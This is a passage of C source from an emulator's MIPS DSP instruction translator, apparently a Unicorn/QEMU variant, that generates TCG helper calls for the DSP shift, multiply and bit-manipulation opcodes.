v1_t); break; case OPC_SUBQ_PW: check_dsp(ctx); gen_helper_subq_pw(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_SUBQ_S_PW: check_dsp(ctx); gen_helper_subq_s_pw(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_SUBQ_QH: check_dsp(ctx); gen_helper_subq_qh(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_SUBQ_S_QH: check_dsp(ctx); gen_helper_subq_s_qh(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_SUBU_OB: check_dsp(ctx); gen_helper_subu_ob(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_SUBU_S_OB: check_dsp(ctx); gen_helper_subu_s_ob(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_SUBU_QH: check_dsp_r2(ctx); gen_helper_subu_qh(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t, 
tcg_ctx->cpu_env); break; case OPC_SUBU_S_QH: check_dsp_r2(ctx); gen_helper_subu_s_qh(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_SUBUH_OB: check_dsp_r2(ctx); gen_helper_subuh_ob(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t); break; case OPC_SUBUH_R_OB: check_dsp_r2(ctx); gen_helper_subuh_r_ob(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t); break; case OPC_ADDQ_PW: check_dsp(ctx); gen_helper_addq_pw(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_ADDQ_S_PW: check_dsp(ctx); gen_helper_addq_s_pw(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_ADDQ_QH: check_dsp(ctx); gen_helper_addq_qh(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_ADDQ_S_QH: check_dsp(ctx); gen_helper_addq_s_qh(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_ADDU_OB: check_dsp(ctx); gen_helper_addu_ob(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_ADDU_S_OB: check_dsp(ctx); gen_helper_addu_s_ob(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_ADDU_QH: check_dsp_r2(ctx); gen_helper_addu_qh(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_ADDU_S_QH: check_dsp_r2(ctx); gen_helper_addu_s_qh(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_ADDUH_OB: check_dsp_r2(ctx); gen_helper_adduh_ob(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t); break; case OPC_ADDUH_R_OB: check_dsp_r2(ctx); gen_helper_adduh_r_ob(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t); break; } break; case OPC_CMPU_EQ_OB_DSP: switch (op2) { case OPC_PRECR_OB_QH: check_dsp_r2(ctx); gen_helper_precr_ob_qh(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t); break; case OPC_PRECR_SRA_QH_PW: check_dsp_r2(ctx); { TCGv_i32 ret_t = tcg_const_i32(tcg_ctx, ret); gen_helper_precr_sra_qh_pw(tcg_ctx, v2_t, v1_t, v2_t, ret_t); tcg_temp_free_i32(tcg_ctx, ret_t); break; } case OPC_PRECR_SRA_R_QH_PW: check_dsp_r2(ctx); { TCGv_i32 sa_v = tcg_const_i32(tcg_ctx, ret); gen_helper_precr_sra_r_qh_pw(tcg_ctx, v2_t, v1_t, v2_t, sa_v); tcg_temp_free_i32(tcg_ctx, sa_v); break; } case OPC_PRECRQ_OB_QH: check_dsp(ctx); gen_helper_precrq_ob_qh(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t); break; case OPC_PRECRQ_PW_L: check_dsp(ctx); gen_helper_precrq_pw_l(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t); break; case OPC_PRECRQ_QH_PW: check_dsp(ctx); gen_helper_precrq_qh_pw(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t); break; case OPC_PRECRQ_RS_QH_PW: check_dsp(ctx); gen_helper_precrq_rs_qh_pw(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_PRECRQU_S_OB_QH: check_dsp(ctx); gen_helper_precrqu_s_ob_qh(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); break; } break; #endif } tcg_temp_free(tcg_ctx, v1_t); tcg_temp_free(tcg_ctx, v2_t); } static void gen_mipsdsp_shift(DisasContext *ctx, uint32_t opc, int ret, int v1, int v2) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; uint32_t op2; TCGv t0; TCGv v1_t; TCGv v2_t; if (ret == 0) { /* Treat as NOP. 
*/ return; } t0 = tcg_temp_new(tcg_ctx); v1_t = tcg_temp_new(tcg_ctx); v2_t = tcg_temp_new(tcg_ctx); tcg_gen_movi_tl(tcg_ctx, t0, v1); gen_load_gpr(tcg_ctx, v1_t, v1); gen_load_gpr(tcg_ctx, v2_t, v2); switch (opc) { case OPC_SHLL_QB_DSP: { op2 = MASK_SHLL_QB(ctx->opcode); switch (op2) { case OPC_SHLL_QB: check_dsp(ctx); gen_helper_shll_qb(tcg_ctx, tcg_ctx->cpu_gpr[ret], t0, v2_t, tcg_ctx->cpu_env); break; case OPC_SHLLV_QB: check_dsp(ctx); gen_helper_shll_qb(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_SHLL_PH: check_dsp(ctx); gen_helper_shll_ph(tcg_ctx, tcg_ctx->cpu_gpr[ret], t0, v2_t, tcg_ctx->cpu_env); break; case OPC_SHLLV_PH: check_dsp(ctx); gen_helper_shll_ph(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_SHLL_S_PH: check_dsp(ctx); gen_helper_shll_s_ph(tcg_ctx, tcg_ctx->cpu_gpr[ret], t0, v2_t, tcg_ctx->cpu_env); break; case OPC_SHLLV_S_PH: check_dsp(ctx); gen_helper_shll_s_ph(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_SHLL_S_W: check_dsp(ctx); gen_helper_shll_s_w(tcg_ctx, tcg_ctx->cpu_gpr[ret], t0, v2_t, tcg_ctx->cpu_env); break; case OPC_SHLLV_S_W: check_dsp(ctx); gen_helper_shll_s_w(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_SHRL_QB: check_dsp(ctx); gen_helper_shrl_qb(tcg_ctx, tcg_ctx->cpu_gpr[ret], t0, v2_t); break; case OPC_SHRLV_QB: check_dsp(ctx); gen_helper_shrl_qb(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t); break; case OPC_SHRL_PH: check_dsp_r2(ctx); gen_helper_shrl_ph(tcg_ctx, tcg_ctx->cpu_gpr[ret], t0, v2_t); break; case OPC_SHRLV_PH: check_dsp_r2(ctx); gen_helper_shrl_ph(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t); break; case OPC_SHRA_QB: check_dsp_r2(ctx); gen_helper_shra_qb(tcg_ctx, tcg_ctx->cpu_gpr[ret], t0, v2_t); break; case OPC_SHRA_R_QB: check_dsp_r2(ctx); gen_helper_shra_r_qb(tcg_ctx, tcg_ctx->cpu_gpr[ret], t0, v2_t); break; case OPC_SHRAV_QB: check_dsp_r2(ctx); gen_helper_shra_qb(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t); break; case OPC_SHRAV_R_QB: check_dsp_r2(ctx); gen_helper_shra_r_qb(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t); break; case OPC_SHRA_PH: check_dsp(ctx); gen_helper_shra_ph(tcg_ctx, tcg_ctx->cpu_gpr[ret], t0, v2_t); break; case OPC_SHRA_R_PH: check_dsp(ctx); gen_helper_shra_r_ph(tcg_ctx, tcg_ctx->cpu_gpr[ret], t0, v2_t); break; case OPC_SHRAV_PH: check_dsp(ctx); gen_helper_shra_ph(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t); break; case OPC_SHRAV_R_PH: check_dsp(ctx); gen_helper_shra_r_ph(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t); break; case OPC_SHRA_R_W: check_dsp(ctx); gen_helper_shra_r_w(tcg_ctx, tcg_ctx->cpu_gpr[ret], t0, v2_t); break; case OPC_SHRAV_R_W: check_dsp(ctx); gen_helper_shra_r_w(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t); break; default: /* Invalid */ MIPS_INVAL("MASK SHLL.QB"); generate_exception_end(ctx, EXCP_RI); break; } break; } #ifdef TARGET_MIPS64 case OPC_SHLL_OB_DSP: op2 = MASK_SHLL_OB(ctx->opcode); switch (op2) { case OPC_SHLL_PW: check_dsp(ctx); gen_helper_shll_pw(tcg_ctx, tcg_ctx->cpu_gpr[ret], v2_t, t0, tcg_ctx->cpu_env); break; case OPC_SHLLV_PW: check_dsp(ctx); gen_helper_shll_pw(tcg_ctx, tcg_ctx->cpu_gpr[ret], v2_t, v1_t, tcg_ctx->cpu_env); break; case OPC_SHLL_S_PW: check_dsp(ctx); gen_helper_shll_s_pw(tcg_ctx, tcg_ctx->cpu_gpr[ret], v2_t, t0, tcg_ctx->cpu_env); break; case OPC_SHLLV_S_PW: check_dsp(ctx); gen_helper_shll_s_pw(tcg_ctx, tcg_ctx->cpu_gpr[ret], v2_t, v1_t, tcg_ctx->cpu_env); break; case OPC_SHLL_OB: check_dsp(ctx); gen_helper_shll_ob(tcg_ctx, 
tcg_ctx->cpu_gpr[ret], v2_t, t0, tcg_ctx->cpu_env); break; case OPC_SHLLV_OB: check_dsp(ctx); gen_helper_shll_ob(tcg_ctx, tcg_ctx->cpu_gpr[ret], v2_t, v1_t, tcg_ctx->cpu_env); break; case OPC_SHLL_QH: check_dsp(ctx); gen_helper_shll_qh(tcg_ctx, tcg_ctx->cpu_gpr[ret], v2_t, t0, tcg_ctx->cpu_env); break; case OPC_SHLLV_QH: check_dsp(ctx); gen_helper_shll_qh(tcg_ctx, tcg_ctx->cpu_gpr[ret], v2_t, v1_t, tcg_ctx->cpu_env); break; case OPC_SHLL_S_QH: check_dsp(ctx); gen_helper_shll_s_qh(tcg_ctx, tcg_ctx->cpu_gpr[ret], v2_t, t0, tcg_ctx->cpu_env); break; case OPC_SHLLV_S_QH: check_dsp(ctx); gen_helper_shll_s_qh(tcg_ctx, tcg_ctx->cpu_gpr[ret], v2_t, v1_t, tcg_ctx->cpu_env); break; case OPC_SHRA_OB: check_dsp_r2(ctx); gen_helper_shra_ob(tcg_ctx, tcg_ctx->cpu_gpr[ret], v2_t, t0); break; case OPC_SHRAV_OB: check_dsp_r2(ctx); gen_helper_shra_ob(tcg_ctx, tcg_ctx->cpu_gpr[ret], v2_t, v1_t); break; case OPC_SHRA_R_OB: check_dsp_r2(ctx); gen_helper_shra_r_ob(tcg_ctx, tcg_ctx->cpu_gpr[ret], v2_t, t0); break; case OPC_SHRAV_R_OB: check_dsp_r2(ctx); gen_helper_shra_r_ob(tcg_ctx, tcg_ctx->cpu_gpr[ret], v2_t, v1_t); break; case OPC_SHRA_PW: check_dsp(ctx); gen_helper_shra_pw(tcg_ctx, tcg_ctx->cpu_gpr[ret], v2_t, t0); break; case OPC_SHRAV_PW: check_dsp(ctx); gen_helper_shra_pw(tcg_ctx, tcg_ctx->cpu_gpr[ret], v2_t, v1_t); break; case OPC_SHRA_R_PW: check_dsp(ctx); gen_helper_shra_r_pw(tcg_ctx, tcg_ctx->cpu_gpr[ret], v2_t, t0); break; case OPC_SHRAV_R_PW: check_dsp(ctx); gen_helper_shra_r_pw(tcg_ctx, tcg_ctx->cpu_gpr[ret], v2_t, v1_t); break; case OPC_SHRA_QH: check_dsp(ctx); gen_helper_shra_qh(tcg_ctx, tcg_ctx->cpu_gpr[ret], v2_t, t0); break; case OPC_SHRAV_QH: check_dsp(ctx); gen_helper_shra_qh(tcg_ctx, tcg_ctx->cpu_gpr[ret], v2_t, v1_t); break; case OPC_SHRA_R_QH: check_dsp(ctx); gen_helper_shra_r_qh(tcg_ctx, tcg_ctx->cpu_gpr[ret], v2_t, t0); break; case OPC_SHRAV_R_QH: check_dsp(ctx); gen_helper_shra_r_qh(tcg_ctx, tcg_ctx->cpu_gpr[ret], v2_t, v1_t); break; case OPC_SHRL_OB: check_dsp(ctx); gen_helper_shrl_ob(tcg_ctx, tcg_ctx->cpu_gpr[ret], v2_t, t0); break; case OPC_SHRLV_OB: check_dsp(ctx); gen_helper_shrl_ob(tcg_ctx, tcg_ctx->cpu_gpr[ret], v2_t, v1_t); break; case OPC_SHRL_QH: check_dsp_r2(ctx); gen_helper_shrl_qh(tcg_ctx, tcg_ctx->cpu_gpr[ret], v2_t, t0); break; case OPC_SHRLV_QH: check_dsp_r2(ctx); gen_helper_shrl_qh(tcg_ctx, tcg_ctx->cpu_gpr[ret], v2_t, v1_t); break; default: /* Invalid */ MIPS_INVAL("MASK SHLL.OB"); generate_exception_end(ctx, EXCP_RI); break; } break; #endif } tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, v1_t); tcg_temp_free(tcg_ctx, v2_t); } static void gen_mipsdsp_multiply(DisasContext *ctx, uint32_t op1, uint32_t op2, int ret, int v1, int v2, int check_ret) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i32 t0; TCGv v1_t; TCGv v2_t; if ((ret == 0) && (check_ret == 1)) { /* Treat as NOP. */ return; } t0 = tcg_temp_new_i32(tcg_ctx); v1_t = tcg_temp_new(tcg_ctx); v2_t = tcg_temp_new(tcg_ctx); tcg_gen_movi_i32(tcg_ctx, t0, ret); gen_load_gpr(tcg_ctx, v1_t, v1); gen_load_gpr(tcg_ctx, v2_t, v2); switch (op1) { /* * OPC_MULT_G_2E, OPC_ADDUH_QB_DSP, OPC_MUL_PH_DSP have * the same mask and op1. 
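     * The op2 minor opcode, decoded by the switch below, selects the
     * actual operation.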
*/ case OPC_MULT_G_2E: check_dsp_r2(ctx); switch (op2) { case OPC_MUL_PH: gen_helper_mul_ph(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_MUL_S_PH: gen_helper_mul_s_ph(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_MULQ_S_W: gen_helper_mulq_s_w(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_MULQ_RS_W: gen_helper_mulq_rs_w(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); break; } break; case OPC_DPA_W_PH_DSP: switch (op2) { case OPC_DPAU_H_QBL: check_dsp(ctx); gen_helper_dpau_h_qbl(tcg_ctx, t0, v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_DPAU_H_QBR: check_dsp(ctx); gen_helper_dpau_h_qbr(tcg_ctx, t0, v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_DPSU_H_QBL: check_dsp(ctx); gen_helper_dpsu_h_qbl(tcg_ctx, t0, v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_DPSU_H_QBR: check_dsp(ctx); gen_helper_dpsu_h_qbr(tcg_ctx, t0, v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_DPA_W_PH: check_dsp_r2(ctx); gen_helper_dpa_w_ph(tcg_ctx, t0, v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_DPAX_W_PH: check_dsp_r2(ctx); gen_helper_dpax_w_ph(tcg_ctx, t0, v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_DPAQ_S_W_PH: check_dsp(ctx); gen_helper_dpaq_s_w_ph(tcg_ctx, t0, v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_DPAQX_S_W_PH: check_dsp_r2(ctx); gen_helper_dpaqx_s_w_ph(tcg_ctx, t0, v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_DPAQX_SA_W_PH: check_dsp_r2(ctx); gen_helper_dpaqx_sa_w_ph(tcg_ctx, t0, v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_DPS_W_PH: check_dsp_r2(ctx); gen_helper_dps_w_ph(tcg_ctx, t0, v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_DPSX_W_PH: check_dsp_r2(ctx); gen_helper_dpsx_w_ph(tcg_ctx, t0, v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_DPSQ_S_W_PH: check_dsp(ctx); gen_helper_dpsq_s_w_ph(tcg_ctx, t0, v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_DPSQX_S_W_PH: check_dsp_r2(ctx); gen_helper_dpsqx_s_w_ph(tcg_ctx, t0, v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_DPSQX_SA_W_PH: check_dsp_r2(ctx); gen_helper_dpsqx_sa_w_ph(tcg_ctx, t0, v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_MULSAQ_S_W_PH: check_dsp(ctx); gen_helper_mulsaq_s_w_ph(tcg_ctx, t0, v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_DPAQ_SA_L_W: check_dsp(ctx); gen_helper_dpaq_sa_l_w(tcg_ctx, t0, v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_DPSQ_SA_L_W: check_dsp(ctx); gen_helper_dpsq_sa_l_w(tcg_ctx, t0, v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_MAQ_S_W_PHL: check_dsp(ctx); gen_helper_maq_s_w_phl(tcg_ctx, t0, v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_MAQ_S_W_PHR: check_dsp(ctx); gen_helper_maq_s_w_phr(tcg_ctx, t0, v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_MAQ_SA_W_PHL: check_dsp(ctx); gen_helper_maq_sa_w_phl(tcg_ctx, t0, v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_MAQ_SA_W_PHR: check_dsp(ctx); gen_helper_maq_sa_w_phr(tcg_ctx, t0, v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_MULSA_W_PH: check_dsp_r2(ctx); gen_helper_mulsa_w_ph(tcg_ctx, t0, v1_t, v2_t, tcg_ctx->cpu_env); break; } break; #ifdef TARGET_MIPS64 case OPC_DPAQ_W_QH_DSP: { int ac = ret & 0x03; tcg_gen_movi_i32(tcg_ctx, t0, ac); switch (op2) { case OPC_DMADD: check_dsp(ctx); gen_helper_dmadd(tcg_ctx, v1_t, v2_t, t0, tcg_ctx->cpu_env); break; case OPC_DMADDU: check_dsp(ctx); gen_helper_dmaddu(tcg_ctx, v1_t, v2_t, t0, tcg_ctx->cpu_env); break; case OPC_DMSUB: check_dsp(ctx); gen_helper_dmsub(tcg_ctx, v1_t, v2_t, t0, tcg_ctx->cpu_env); break; case OPC_DMSUBU: check_dsp(ctx); gen_helper_dmsubu(tcg_ctx, v1_t, v2_t, t0, tcg_ctx->cpu_env); break; case 
OPC_DPA_W_QH: check_dsp_r2(ctx); gen_helper_dpa_w_qh(tcg_ctx, v1_t, v2_t, t0, tcg_ctx->cpu_env); break; case OPC_DPAQ_S_W_QH: check_dsp(ctx); gen_helper_dpaq_s_w_qh(tcg_ctx, v1_t, v2_t, t0, tcg_ctx->cpu_env); break; case OPC_DPAQ_SA_L_PW: check_dsp(ctx); gen_helper_dpaq_sa_l_pw(tcg_ctx, v1_t, v2_t, t0, tcg_ctx->cpu_env); break; case OPC_DPAU_H_OBL: check_dsp(ctx); gen_helper_dpau_h_obl(tcg_ctx, v1_t, v2_t, t0, tcg_ctx->cpu_env); break; case OPC_DPAU_H_OBR: check_dsp(ctx); gen_helper_dpau_h_obr(tcg_ctx, v1_t, v2_t, t0, tcg_ctx->cpu_env); break; case OPC_DPS_W_QH: check_dsp_r2(ctx); gen_helper_dps_w_qh(tcg_ctx, v1_t, v2_t, t0, tcg_ctx->cpu_env); break; case OPC_DPSQ_S_W_QH: check_dsp(ctx); gen_helper_dpsq_s_w_qh(tcg_ctx, v1_t, v2_t, t0, tcg_ctx->cpu_env); break; case OPC_DPSQ_SA_L_PW: check_dsp(ctx); gen_helper_dpsq_sa_l_pw(tcg_ctx, v1_t, v2_t, t0, tcg_ctx->cpu_env); break; case OPC_DPSU_H_OBL: check_dsp(ctx); gen_helper_dpsu_h_obl(tcg_ctx, v1_t, v2_t, t0, tcg_ctx->cpu_env); break; case OPC_DPSU_H_OBR: check_dsp(ctx); gen_helper_dpsu_h_obr(tcg_ctx, v1_t, v2_t, t0, tcg_ctx->cpu_env); break; case OPC_MAQ_S_L_PWL: check_dsp(ctx); gen_helper_maq_s_l_pwl(tcg_ctx, v1_t, v2_t, t0, tcg_ctx->cpu_env); break; case OPC_MAQ_S_L_PWR: check_dsp(ctx); gen_helper_maq_s_l_pwr(tcg_ctx, v1_t, v2_t, t0, tcg_ctx->cpu_env); break; case OPC_MAQ_S_W_QHLL: check_dsp(ctx); gen_helper_maq_s_w_qhll(tcg_ctx, v1_t, v2_t, t0, tcg_ctx->cpu_env); break; case OPC_MAQ_SA_W_QHLL: check_dsp(ctx); gen_helper_maq_sa_w_qhll(tcg_ctx, v1_t, v2_t, t0, tcg_ctx->cpu_env); break; case OPC_MAQ_S_W_QHLR: check_dsp(ctx); gen_helper_maq_s_w_qhlr(tcg_ctx, v1_t, v2_t, t0, tcg_ctx->cpu_env); break; case OPC_MAQ_SA_W_QHLR: check_dsp(ctx); gen_helper_maq_sa_w_qhlr(tcg_ctx, v1_t, v2_t, t0, tcg_ctx->cpu_env); break; case OPC_MAQ_S_W_QHRL: check_dsp(ctx); gen_helper_maq_s_w_qhrl(tcg_ctx, v1_t, v2_t, t0, tcg_ctx->cpu_env); break; case OPC_MAQ_SA_W_QHRL: check_dsp(ctx); gen_helper_maq_sa_w_qhrl(tcg_ctx, v1_t, v2_t, t0, tcg_ctx->cpu_env); break; case OPC_MAQ_S_W_QHRR: check_dsp(ctx); gen_helper_maq_s_w_qhrr(tcg_ctx, v1_t, v2_t, t0, tcg_ctx->cpu_env); break; case OPC_MAQ_SA_W_QHRR: check_dsp(ctx); gen_helper_maq_sa_w_qhrr(tcg_ctx, v1_t, v2_t, t0, tcg_ctx->cpu_env); break; case OPC_MULSAQ_S_L_PW: check_dsp(ctx); gen_helper_mulsaq_s_l_pw(tcg_ctx, v1_t, v2_t, t0, tcg_ctx->cpu_env); break; case OPC_MULSAQ_S_W_QH: check_dsp(ctx); gen_helper_mulsaq_s_w_qh(tcg_ctx, v1_t, v2_t, t0, tcg_ctx->cpu_env); break; } } break; #endif case OPC_ADDU_QB_DSP: switch (op2) { case OPC_MULEU_S_PH_QBL: check_dsp(ctx); gen_helper_muleu_s_ph_qbl(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_MULEU_S_PH_QBR: check_dsp(ctx); gen_helper_muleu_s_ph_qbr(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_MULQ_RS_PH: check_dsp(ctx); gen_helper_mulq_rs_ph(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_MULEQ_S_W_PHL: check_dsp(ctx); gen_helper_muleq_s_w_phl(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_MULEQ_S_W_PHR: check_dsp(ctx); gen_helper_muleq_s_w_phr(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_MULQ_S_PH: check_dsp_r2(ctx); gen_helper_mulq_s_ph(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); break; } break; #ifdef TARGET_MIPS64 case OPC_ADDU_OB_DSP: switch (op2) { case OPC_MULEQ_S_PW_QHL: check_dsp(ctx); gen_helper_muleq_s_pw_qhl(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); break; case 
OPC_MULEQ_S_PW_QHR: check_dsp(ctx); gen_helper_muleq_s_pw_qhr(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_MULEU_S_QH_OBL: check_dsp(ctx); gen_helper_muleu_s_qh_obl(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_MULEU_S_QH_OBR: check_dsp(ctx); gen_helper_muleu_s_qh_obr(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_MULQ_RS_QH: check_dsp(ctx); gen_helper_mulq_rs_qh(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); break; } break; #endif } tcg_temp_free_i32(tcg_ctx, t0); tcg_temp_free(tcg_ctx, v1_t); tcg_temp_free(tcg_ctx, v2_t); } static void gen_mipsdsp_bitinsn(DisasContext *ctx, uint32_t op1, uint32_t op2, int ret, int val) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; int16_t imm; TCGv t0; TCGv val_t; if (ret == 0) { /* Treat as NOP. */ return; } t0 = tcg_temp_new(tcg_ctx); val_t = tcg_temp_new(tcg_ctx); gen_load_gpr(tcg_ctx, val_t, val); switch (op1) { case OPC_ABSQ_S_PH_DSP: switch (op2) { case OPC_BITREV: check_dsp(ctx); gen_helper_bitrev(tcg_ctx, tcg_ctx->cpu_gpr[ret], val_t); break; case OPC_REPL_QB: check_dsp(ctx); { target_long result; imm = (ctx->opcode >> 16) & 0xFF; result = (uint32_t)imm << 24 | (uint32_t)imm << 16 | (uint32_t)imm << 8 | (uint32_t)imm; result = (int32_t)result; tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr[ret], result); } break; case OPC_REPLV_QB: check_dsp(ctx); tcg_gen_ext8u_tl(tcg_ctx, tcg_ctx->cpu_gpr[ret], val_t); tcg_gen_shli_tl(tcg_ctx, t0, tcg_ctx->cpu_gpr[ret], 8); tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_gpr[ret], tcg_ctx->cpu_gpr[ret], t0); tcg_gen_shli_tl(tcg_ctx, t0, tcg_ctx->cpu_gpr[ret], 16); tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_gpr[ret], tcg_ctx->cpu_gpr[ret], t0); tcg_gen_ext32s_tl(tcg_ctx, tcg_ctx->cpu_gpr[ret], tcg_ctx->cpu_gpr[ret]); break; case OPC_REPL_PH: check_dsp(ctx); { imm = (ctx->opcode >> 16) & 0x03FF; imm = (int16_t)(imm << 6) >> 6; tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr[ret], \ (target_long)((int32_t)imm << 16 | \ (uint16_t)imm)); } break; case OPC_REPLV_PH: check_dsp(ctx); tcg_gen_ext16u_tl(tcg_ctx, tcg_ctx->cpu_gpr[ret], val_t); tcg_gen_shli_tl(tcg_ctx, t0, tcg_ctx->cpu_gpr[ret], 16); tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_gpr[ret], tcg_ctx->cpu_gpr[ret], t0); tcg_gen_ext32s_tl(tcg_ctx, tcg_ctx->cpu_gpr[ret], tcg_ctx->cpu_gpr[ret]); break; } break; #ifdef TARGET_MIPS64 case OPC_ABSQ_S_QH_DSP: switch (op2) { case OPC_REPL_OB: check_dsp(ctx); { target_long temp; imm = (ctx->opcode >> 16) & 0xFF; temp = ((uint64_t)imm << 8) | (uint64_t)imm; temp = (temp << 16) | temp; temp = (temp << 32) | temp; tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr[ret], temp); break; } case OPC_REPL_PW: check_dsp(ctx); { target_long temp; imm = (ctx->opcode >> 16) & 0x03FF; imm = (int16_t)(imm << 6) >> 6; temp = ((target_long)imm << 32) \ | ((target_long)imm & 0xFFFFFFFF); tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr[ret], temp); break; } case OPC_REPL_QH: check_dsp(ctx); { target_long temp; imm = (ctx->opcode >> 16) & 0x03FF; imm = (int16_t)(imm << 6) >> 6; temp = ((uint64_t)(uint16_t)imm << 48) | ((uint64_t)(uint16_t)imm << 32) | ((uint64_t)(uint16_t)imm << 16) | (uint64_t)(uint16_t)imm; tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr[ret], temp); break; } case OPC_REPLV_OB: check_dsp(ctx); tcg_gen_ext8u_tl(tcg_ctx, 